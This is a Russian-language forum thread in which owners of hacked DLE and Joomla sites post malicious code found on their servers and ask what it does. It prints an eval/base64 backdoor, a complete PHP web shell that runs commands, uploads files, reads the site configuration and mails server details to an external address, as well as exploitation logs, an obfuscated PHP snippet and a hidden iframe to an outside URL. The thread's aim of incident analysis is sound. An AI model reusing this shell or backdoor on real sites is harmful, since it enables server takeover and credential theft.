Общая тема о борьбе с шеллами и вирусами на сайте

Всем привет. нашел у себя на сайте в engine/data/config.php и в dbconfig.php

такую херню:

if(!empty($_POST['g1'])) {

eval(base64_decode($_POST['g1']));

die;

}

if(!empty($_POST['g2'])) eval(base64_decode($_POST['g2']));

if(!empty($_GET['g2'])) eval(base64_decode($_GET['g2']));

Что она значит? И есть ли еще, где нибудь файлы связанные с этим скриптом?

kenduk, она означает, что если кто-то передаст скрипту переменную g1, то ее содержимое раскодируется из base64 и выполнится

так а где может лежать этот код base64. Я так понял он у меня, где то в других файлах?

kenduk, в GET или POST запросе извне

Ну если я удалю этот код, то не будет никаких сценариев?

kenduk, в этом месте не будет

Добрый день!

Вскрыли жумловский сайт и разместили закодированный в base64 вот такой файл

@ini_restore("disable_functions");if (!isset($_SESSION['bajak'])) {$visitcount = 0;$web = $_SERVER["HTTP_HOST"];$inj = $_SERVER["REQUEST_URI"];$body = "Shell Injector \n$web$inj";$safem0de = @ini_get('safe_mode');if (!$safem0de) {$security= "SAFE_MODE = OFF";}else {$security= "SAFE_MODE = ON";};$df='ini_get disable!';$serper=gethostbyname($_SERVER['SERVER_ADDR']);$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);mail("peterdlegend@aol.com", "$body","Shell Result http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");$_SESSION['bajak'] = 0;}else {$_SESSION['bajak']++;};if(isset($_GET['clone'])){$source = $_SERVER['SCRIPT_FILENAME'];$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";rename($source, $desti);}$safem0de = @ini_get('safe_mode');if (!$safem0de) {$security= "SAFE_MODE : OFF";}else {$security= "SAFE_MODE : ON";}echo "<title>Peterson - Shell</title><br>

<br>

";echo "<font size=2 color=#888888><b>".$security."</b><br>

";$cur_user="(".get_current_user().")";echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>

";echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>

";echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get disable!';if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}function pwd() {$cwd = getcwd();if($u=strrpos($cwd,'/')){if($u!=strlen($cwd)-1){return $cwd.'/';}else{return $cwd;};}elseif($u=strrpos($cwd,'\\')){if($u!=strlen($cwd)-1){return $cwd.'\\';}else{return $cwd;};};}echo '

<form method="POST" action="">

<font size=2 color=#888888><b>Command</b><br>

<input type="text" name="cmd"><input type="Submit" name="command" value="cok">

</form>

';echo '

<form enctype="multipart/form-data" action method=POST>

<font size=2 color=#888888><b>Upload File</b></font><br>

<input type=hidden name="submit"><input type=file name="userfile" size=28><br>

<font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload">

</form>

';if(isset($_POST['submit'])){$uploaddir = pwd();if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){echo "Upload Failed";} else { echo "Upload Success to ".$uploaddir.$name." :D "; }}if(isset($_POST['command'])){$cmd = $_POST['cmd'];echo "

<pre>

<font size=3 color=#000000>".shell_exec($cmd)."</font>

</pre>

";}else { echo "

<pre>

<font size=3 color=#000000>".shell_exec('ls -la')."</font>

</pre>

";}if(isset($_GET['baca'])){$conf = file_get_contents("../../configuration.php");echo $conf;}

Подскажите, что он делает и как это дело предотвратить, сайт на Joomla

Вот кусок log-файла

www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:45 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 69 "-" "BOT/0.1 (BOT for JCE)" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:53 +0400] "GET //images/stories/petx.gif HTTP/1.1" 200 1580 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:53 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:58 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:17:59:58 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php?bajak HTTP/1.1" 200 6874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php HTTP/1.1" 200 6874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:01 +0400] "GET //images/stories/petx.php?baca HTTP/1.1" 200 9152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:16 +0400] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 69 "-" "BOT/0.1 (BOT for JCE)" 0

www.site.ru 77.222.61.84 - - [10/Feb/2014:18:00:24 +0400] "GET /component/content//images/stories/petx.gif HTTP/1.1" 404 1107 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0

На сайте стоит некий JCE Plugin Manager, как я понимаю вскрыли через него?

После влома сайта в index нашел закодированый скрипт

и файлик пхп со следущим содержанием - так понимаю сам шелл

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;

$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];

$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );

$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );

$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];

$_=$

$_[$__+ $__] ;$_[@-_]($_[@!+_] );

вопрос в следушем возможно эту муть раскодироваь уж больно интересно глянуть что там

Этот обрывок кода на шелл не тянет... Похоже на криво или не полностью обфусцированную гадость.

возможно я еще что то ненашел... в индексе в закадированом виде прописали

<iframe src="http://quantum-life.com/ex/js/jquery/.svn/.INF/props/index.php?out=1378379469" width="0" height="0" frameborder="0"></iframe>

плюс пхп нашел с этим содержанием.... видимо надо рыть глубже... а возможно ка либо узнать что делает этот скрипт? во фрейме который